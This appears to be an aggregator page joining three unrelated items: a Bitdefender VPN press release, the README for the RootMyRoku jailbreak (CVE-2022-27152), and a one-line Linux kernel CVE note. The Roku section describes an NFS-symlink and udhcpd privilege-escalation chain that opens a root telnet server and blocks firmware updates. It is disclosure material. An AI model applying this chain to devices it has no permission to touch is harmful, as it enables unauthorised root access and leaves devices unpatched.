BUCHAREST, Romania and SANTA CLARA, Calif., April 21, 2022 -- Bitdefender, a global cybersecurity leader, today announced new enhancements to its Bitdefender Premium Virtual Private Network (VPN) Service designed to bolster privacy, identity protection and security for consumers. New ad blocker and anti-tracker modules as well as whitelist capabilities provide consumers with secure and private web browsing from anywhere in the world using a computer or mobile device. It is simple to set up and comes with an intuitive interface for any level user.

Cybersecurity and data privacy are converging as consumers grow increasingly concerned about who has access to their personally identifiable information, as well as data collected about their online activities and how that data is sold, traded and used. Even when consumers use so-called "Private Browsing" or "Incognito" modes on major web browsers, internet service providers (ISPs), wireless hotspots and websites often still collect information about their browsing history and online behavior.

Data tracking, spyware and other malicious threats are still a reality on open public Wi-Fi networks. According to Firefox telemetry, about 80 percent of web traffic globally is encrypted. Additionally, a study found that about six percent of the top 10,000 websites secured by HTTPS had TLS protocol security flaws.

Recent Bitdefender research revealed that most consumers are highly exposed to risk, with the majority (61 percent) not using VPN services and anti-trackers, ad blockers (44 percent) or privacy software of any type (64 percent) on the personal devices they use most for online activities.

"It has become increasingly difficult for consumers to maintain privacy and keep their data secure as they conduct their digital lives online," said Ciprian Istrate, vice president, Bitdefender Consumer Solutions. "We incorporated ad blocking and anti-tracking capabilities to Bitdefender Premium VPN to deliver both solid protection and anonymity as users enjoy favorite online activities without concern their online behaviors are being tracked or personal data collected and sold either legally or illegally."

**Bitdefender Premium VPN Key Features**

*   **Powerful Encryption for All Web Traffic** \-- Securely encrypt all incoming and outgoing web traffic for Windows, Mac, Android and iOS devices leveraging over 4,000 Bitdefender VPN servers across 49 countries. Keep online identities and activities safe from hackers, ISPs and others for safe online streaming and downloads, with no traffic logs.
*   **Built-In Ad Blocker for Better Browsing Experience** \-- Native ad blocker module removes ads, banners, pop-ups and video ads from websites for a better browsing experience. Blocking intrusive ads reduces the risk of adware and malware, and helps users save bandwidth while reclaiming the entire screen for relevant content only.
*   **Prevent Online Profiling With Anti-Tracker --** Block advertisers, websites and other third-parties from collecting data such as device type, location, web queries, shopping preferences and more. Preventing the collection of such data not only protects consumer privacy, it can speed performance of users' devices.
*   **Achieve System-Wide Protection --** As opposed to web browser extensions that only offer privacy within that browser, Bitdefender VPN Premium blocks disrupting ads and tracking modules across the user's entire device without slowing down systems or leaving gaps in defense.
*   **Whitelist Trusted Websites --** Easily make exceptions to ad blocking and anti-tracking features as desired, by adding the URLs of specific, trusted domains to a whitelist. This enables VPN users to ensure secure, encrypted browsing while accessing websites that might otherwise not load properly when tracking codes are blocked.

**Availability**

Bitdefender Premium VPN is available for Windows, macOS, Android and iOS devices. New ad blocker, anti-tracker and whitelist capabilities are now available to all users, including free and trial customers. For more information or to purchase Bitdefender Premium VPN visit https://www.bitdefender.com/solutions/vpn.html.

**About Bitdefender**

Bitdefender provides cybersecurity solutions with leading security efficacy, performance and ease of use to small and medium businesses, mid-market enterprises and consumers. Guided by a vision to be the world's most trusted cybersecurity solutions provider, Bitdefender is committed to defending organizations and individuals around the globe against cyberattacks to transform and improve their digital experience. For more information, visit https://www.bitdefender.com.

Bitdefender Enhances Premium VPN Service With New Privacy Protection Technologies

Roku devices running RokuOS v9.4.0 build 4200 or earlier that uses a Realtek WiFi chip is vulnerable to Arbitrary file modification.

**Root My Roku**

A persistent root jailbreak for RokuOS v9.4.0 build 4200 devices using a Realtek WiFi chip.  
A big thank you to ammar2 and popeax from the Exploitee.rs Discord for helping discover and develop this.

**Features**

*   Spawns a telnet server running as root on port 8023.
*   Enables the low-level hardware developer mode.
*   Adds many new secret screens and debug features to the main menu.
*   _Blocks channel updates, firmware updates, and all communication with Roku servers._

**Usage**

1.  Download any new channels you might want to use after the jailbreak.  
    Once you jailbreak your device, all communication with Roku's servers will be blocked.  
    Any channels you currently have installed should continue to work.  
    Please see the F.A.Q. below for details.
2.  Enable Developer Settings on your Roku device.
3.  Download the latest dev-channel.zip from the releases page.
4.  Upload dev-channel.zip using the guide from the previous step.
5.  Follow the prompts on screen, then reboot to jailbreak!

**Applications**

*   Using a Roku TV to drive ambient lighting: https://www.youtube.com/watch?v=V\_enynuw-rc (details).

**F.A.Q.****Which devices does this affect?**

Affected devices include _almost all_ Roku TVs and some Roku set-top boxes.  
In theory, any Roku device running RokuOS v9.4.0 build 4200 or earlier that uses a Realtek WiFi chip is vulnerable.  
You can check your current software version from Settings -> System -> About.  
While it is not possible to manually check your WiFi chip manufacturer, the channel provided for this exploit will tell you if your device is vulnerable or not.

**Can this brick my device?**

No! It makes no changes to the underlying firmware that the device runs.  
If anything bad happens, a factory reset will always recover your device.

**How do I un-jailbreak my device?**

You have two options:

*   Factory reset your device. This will clear NVRAM and remove the jailbreak.
*   Using the telnet server on port 8023, delete /nvram/udhcpd-p2p.conf and reboot.

**Is Roku aware of this exploit?**

Some of the critical components required for the exploit chain no longer work in RokuOS v10.  
The NFS mount option that is used for arbitrary file modification gets disabled, and the service used for persistence and privilege escalation is no longer used.

While RokuOS v10 has started rolling out, many devices have not received the update yet.

**Why does the jailbreak block communication with Roku servers?**

This is a precautionary measure to prevent the jailbreak from being disabled or removed.  
In the past, Roku has taken some _creative_ measures to forcefully patch jailbroken devices. One such example was an update to the screensaver channel that would check for a telnet service, connect to it, and command it to un-root and update the device.

Unfortunately, the servers used for channel and firmware updates the same ones used to communicate with Roku in general. Blocking updates means that no new channels can be installed and that certain features like "My Feed" and "Search" will no longer work.  
Applications that communicate with other services (e.g. YouTube, Netflix, HBO) will still work.

**How can I prevent my non-jailbroken Roku from updating?**

Edit your modem/router's DNS settings to use the IP address of dns.rootmyroku.com.  
You can find the current IP address using nslookup, dig, or online DNS lookup tools.

**Why should I trust the code you execute on my device?**

You don't have to!

All of the files required to reproduce this exploit are available in this repo:

*   The local channel used to load the remote payload is available under local.
*   The remote payload loaded over NFS is available under remote.
*   The script used to create the NFS and DNS servers are available under server.

**Exploit Details**

There's two main vulnerabilities that make this exploit possible: arbitrary file modification and privilege escalation.

RokuOS actually does a decently good job at sandboxing channels to prevent them from accessing the underlying filesystem. In addition to running as a restricted user, a software sandbox, and a chroot jail, Roku's Linux kernel has grsecurity patches applied. These patches mitigate common exploit techniques used in jailbreaks and privilege escalation. Furthermore, the entire root filesystem is read-only and baked into the firmware. Only persistent storage (NVRAM) and temp directories are writable.

**Arbitrary File Modification**

Two things conspired to allow arbitrary file modification. The first was that an undocumented pkg_nfs_mount channel manifest option. This option was meant to reduce the software development lifecycle when creating a channel by allowing the channel's source code to be hosted on a different machine using NFS. This removes the need to re-package and re-upload channels after every code change.  
The second was a shortcoming of the grsecurity patches and the Linux kernel in general: symlinks over NFS act weird. While grsecurity was configured specifically to not allow symlinking to directories owned by other users, the ownership and permission checks no longer work properly when the symlink resides on an NFS mount. This allows us to create a symlink in the remote channel's package that points to the root of the main filesystem. (See remote/source/Main.brs for details.)  
This provided us with the ability to modify persistent storage and temp files, but only as the app user.

**Privilege Escalation**

From there, we discovered that the process that configures udhcpd (a DHCP service used for pairing speakers and remotes) for Realtek chipsets could be made to read a config file from NVRAM, a location that the app user has access to. If we could leverage it properly, it would let us manipulate a service running as the root user and also give us a means of persisting across reboots. Thankfully, udhcpd has an option for executing a script (notify_file) with a single parameter (lease_file) whenever a DHCP lease is created. It wasn't perfect though: the udhcpd service would only run the script if it has the "execute" bit set. While we could create arbitrary files using our previous exploit, we didn't have control over the file's permissions and as a result, none of the payload scripts we create are marked as executable. To make matters more difficult, we couldn't pass the payload script as lease_file to the built-in shell executables because udhcpd would overwrite the script contents first.  
Ultimately, the solution involved creating a lease_file value polyglot that is both an AWK script and a legal file name. (See remote/bootstrap.conf for details.)

**Footnote**

If anyone at Roku is reading this: you desperately need a _real_ bug bounty program.

Without one, there's little incentive to research and report vulnerabilities when you're not sure if you'll be rewarded for your efforts or not. While we took this project on for fun as a hobby, almost no professional security researchers are going to dedicate as much effort as we did for a "maybe".

CVE-2022-27152: GitHub - llamasoft/RootMyRoku: A persistent root jailbreak for most Roku devices.

jbd2_journal_wait_updates in fs/jbd2/transaction.c in the Linux kernel before 5.17.1 has a use-after-free caused by a transaction_t race condition.

Tag

#wifi